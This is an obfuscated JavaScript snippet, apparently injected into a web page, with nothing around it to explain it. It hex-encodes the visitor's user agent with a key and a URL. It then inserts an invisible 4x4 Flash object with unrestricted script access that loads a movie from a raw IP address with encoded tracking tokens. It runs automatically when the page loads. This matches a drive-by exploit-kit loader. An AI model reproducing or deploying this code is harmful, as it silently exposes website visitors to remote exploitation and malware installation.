/*s91135d60761hssfj5106fs*/function hgfgerdfgdf(num, width){/*s30353d60184hfj35202fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s93039d8382hfj22448fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s74701d56639hfj91147fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s30198d29851hfj36916fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd43133hfs*/c += b + d;/*s57734d81840hfj9810fs*/e += 1;}return c;}/*s18363dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.162/?NDYwNzk1&man=CzjEXUeQRjmIhfAQgR9fusjEPTz0Cd0p_T_BLbZwhFq5GUFrhp2lXxx7Akdc4mzxWL6FETi-tL&pan=xXzQMvWdbRXQCJ3EKvrcT6NHMVHRH0CL2Y-dmrHQefjaeVWkzrHFTF_xozKASwSG6_JtdfJSDQ&shop=MzE4NzczNTc=", ghnvbn("http://188.225.33.162/?NTkwMzI3&pan=xXzQMvWebRXQCJ3EKvncT6NEMVHRH0CL2Y-dmrHTefjaelWkzrLFTF_yozKASASG6_JtdfJSDQ&man=CzjEXUeQdjmIhcAQgR9fusjEPTz0Cd0p_T_xLbZwtFq5GUFrhp2lXxx7Akd8smzxCF61ENjOge&gift=MzAxODk4NzQ=","wexykukusw"));